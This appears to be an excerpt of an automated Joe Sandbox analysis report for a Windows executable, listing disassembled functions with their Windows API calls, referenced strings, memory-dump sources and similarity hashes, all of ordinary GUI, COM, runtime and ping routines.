GetDlgItem.USER32(?,000003E9), ref: 0045C372
GetWindowRect.USER32(00000000,?), ref: 0045C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
Instruction ID: 11649da17df5d0755d73b9da25d5b781727aa351e01af551b5c423be9c7c6dfa
Opcode Fuzzy Hash: ee900cb0418c209eff2971d5848f65fb009066793c70c2948a602d6ec38bc7ab
Instruction Fuzzy Hash: 62517071B00305AFDB08CFA9DD89AAEBBB6EB88311F14853DF915E7291D7709D448B14

Function 0040201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
DeleteObject.GDI32(00000000), ref: 0043BD1C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
Instruction ID: edfb5b42e1aee2da2af7767ce8276f4fdeab99f29820ea46fc720bac3244b47a
Opcode Fuzzy Hash: 1fe7eb120fb530a9d0c3e86e2d255934ae6300064fd6ce35022d9647bea66392
Instruction Fuzzy Hash: B0617E34101B10DFD735AF14CA48B2A77F1FB44316F50943EE642AAAE0C7B8A891DB99

Function 004021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetSysColor.USER32(0000000F), ref: 004021D3

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
Instruction ID: b625a7fc61febfd2c935065ad26fa2a4911c749eaed189314b0e0014d1ee1d2c
Opcode Fuzzy Hash: c544c20de1596d8a35e8bd9b7102db0368e0aafd3e371b07eaad61ce13d863f6
Instruction Fuzzy Hash: 0B41E531000100EFDB215F68DC8CBBA3B65EB46331F1442BAFE619A2E1C7758C86DB69

Function 0046A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
_wcscpy.LIBCMT ref: 0046A9FF

Strings

fixed, xrefs: 0046A953
ramdisk, xrefs: 0046A97F
network, xrefs: 0046A969
all, xrefs: 0046A911
removable, xrefs: 0046A93D
cdrom, xrefs: 0046A927
unknown, xrefs: 0046A996

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
Opcode Fuzzy Hash: 556639d0dcd09af84e262d548350a2ad112727df3badb39c837963bed888a9a7
Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B

Function 00409837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00409862
__swprintf.LIBCMT ref: 004098AC
__i64tow.LIBCMT ref: 0043F5E6

Strings

%.15g, xrefs: 004098A6
True, xrefs: 0043F5A7
False, xrefs: 0043F5AE
0x%p, xrefs: 0043F5C8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 853849db72ab3f03b677a007e191688438c1d122d1ac365313169d74bc3e93e1
Instruction ID: 743c89ec1be8f3b6cfe40c528e2526a533573b02274d3a1687b28713588ebf87
Opcode Fuzzy Hash: 853849db72ab3f03b677a007e191688438c1d122d1ac365313169d74bc3e93e1
Instruction Fuzzy Hash: AB41D772A10205AFDB24EF35D841A7673E8EF09304F20487FE549E6393EA3D9D068B19

Function 00487152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048716A
CreateMenu.USER32 ref: 00487185
SetMenu.USER32(?,00000000), ref: 00487194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
IsMenu.USER32(?), ref: 00487237
CreatePopupMenu.USER32 ref: 00487241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
DrawMenuBar.USER32 ref: 00487276

Strings

F, xrefs: 00487262
0, xrefs: 00487160

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98

Function 004874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
CreateCompatibleDC.GDI32(00000000), ref: 00487565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
SelectObject.GDI32(00000000,00000000), ref: 00487580
GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
DeleteDC.GDI32(00000000), ref: 00487594
GetWindowLongW.USER32(?,000000EC), ref: 0048759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE

Strings

static, xrefs: 004874F6

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8

Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426E3E

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

__gmtime64_s.LIBCMT ref: 00426ED7
__gmtime64_s.LIBCMT ref: 00426F0D
__gmtime64_s.LIBCMT ref: 00426F2A
__allrem.LIBCMT ref: 00426F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
__allrem.LIBCMT ref: 00426FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
__allrem.LIBCMT ref: 00426FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
__invoke_watson.LIBCMT ref: 00427077

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98

Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462542
GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
Sleep.KERNEL32(000001F4), ref: 004625EB
GetMenuItemCount.USER32(?), ref: 0046262F
GetMenuItemID.USER32(?,00000000), ref: 0046264B
GetMenuItemID.USER32(?,-00000001), ref: 00462675
GetMenuItemID.USER32(?,?), ref: 004626BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A

Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
_memset.LIBCMT ref: 00486FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64

Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
VariantInit.OLEAUT32(?), ref: 00456C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
VariantCopy.OLEAUT32(?,?), ref: 00456C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
VariantClear.OLEAUT32(?), ref: 00456CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
VariantClear.OLEAUT32(?), ref: 00456CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94

Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CoInitialize.OLE32 ref: 00478403
CoUninitialize.OLE32 ref: 0047840E
CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
IIDFromString.OLE32(?,?), ref: 004784E1
VariantInit.OLEAUT32(?), ref: 0047857B
VariantClear.OLEAUT32(?), ref: 004785DC

Strings

NULL Pointer assignment, xrefs: 004784B3
Invalid parameter, xrefs: 004784FA
Failed to create object, xrefs: 00478479, 0047852F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: c6f8ca96ce36d867b95c5300b034a7c5a4be955f287127c01fb95931614cda58
Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
Opcode Fuzzy Hash: c6f8ca96ce36d867b95c5300b034a7c5a4be955f287127c01fb95931614cda58
Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A

Function 00475732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00475793
inet_addr.WSOCK32(?,?,?), ref: 004757D8
gethostbyname.WSOCK32(?), ref: 004757E4
IcmpCreateFile.IPHLPAPI ref: 004757F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
WSACleanup.WSOCK32 ref: 004758F3

Strings

Ping, xrefs: 00475816

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8e94fae8daacd7abc9e052551fe7d87f54e2291b82163d083296b085216054c9
Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
Opcode Fuzzy Hash: 8e94fae8daacd7abc9e052551fe7d87f54e2291b82163d083296b085216054c9
Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A

Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
GetLastError.KERNEL32 ref: 0046B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD

Strings

UNKNOWN, xrefs: 0046B575
READY, xrefs: 0046B596
READONLY, xrefs: 0046B588
NOTREADY, xrefs: 0046B57C
INVALID, xrefs: 0046B58F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
